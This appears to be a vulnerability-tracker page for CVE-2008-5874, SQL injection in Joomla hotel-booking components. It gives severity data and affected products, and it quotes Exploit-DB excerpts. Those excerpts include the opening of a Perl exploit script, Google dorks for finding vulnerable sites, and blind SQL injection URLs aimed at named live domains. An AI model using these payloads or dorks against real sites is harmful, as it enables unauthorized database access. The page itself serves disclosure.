CVE-2008-5874
published 2009-01-08
CVE-2008-5874: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL commands…
Priority P3 · 39 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 0.97% (57.6th percentile)
Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php in the (1) com_allhotels or (2) com_5starhotels module. NOTE: some of these details are obtained from third party information.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlahbs | com_5starhotels | — | — |
| joomlahbs | com_allhotels | — | — |
| joomlahbs | hotel_booking_reservation_system | — | — |
GHSA
ghsa_unreviewed·2022-05-17
CVE-2008-5874 [HIGH] CWE-89 GHSA-7c3f-rp75-mw4v: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL c
GHSA
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-3357 [HIGH] CWE-89 GHSA-p29x-jjv6-hfrh: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers
Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) h_id, (2) id, and (3) rid parameters to longDesc.php, and the h_id parameter to (4) detail.php, (5) detail1.php, (6) detail2.php, (7) detail3.php, (8) detail4.php, (9) detail5.php, (10) detail6.php, (11) detail7.php, and (12) detail8.php, different vectors than CVE-2008-5865, CVE-2008-5874, and CVE-2008-5875.
No detection rules found.
Exploit-DB
Joomla! Component 5starhotels - SQL Injection
exploitdb·2008-12-24
CVE-2008-5875 Joomla! Component 5starhotels - SQL Injection
---
#!/usr/bin/perl -w
#Joomla com_5starhotels Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
#[!] Module_Name: com_5starhotels
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_5starhotels"
########################################
system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\
Exploit-DB
Joomla! Component com_lowcosthotels - Blind SQL Injection
exploitdb·2008-12-23
CVE-2008-5875 Joomla! Component com_lowcosthotels - Blind SQL Injection
---
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.joomlahbs.com/
DorK : inurl:index.php?option=com_lowcosthotels
Demo :
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
or
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@
Exploit-DB
Joomla! Component com_allhotels - Blind SQL Injection
exploitdb·2008-12-23
CVE-2008-5875 Joomla! Component com_allhotels - Blind SQL Injection
---
Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.joomlahbs.com/ & http://www.leveltensolutions.net/spa/
DorK : inurl:index.php?option=com_allhotels
Demo :
http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
No writeups or analysis indexed.
http://downloads.securityfocus.com/vulnerabilities/exploits/32952.pl
http://www.securityfocus.com/bid/32952
https://www.exploit-db.com/exploits/7568
https://www.exploit-db.com/exploits/7575
Published 2009-01-08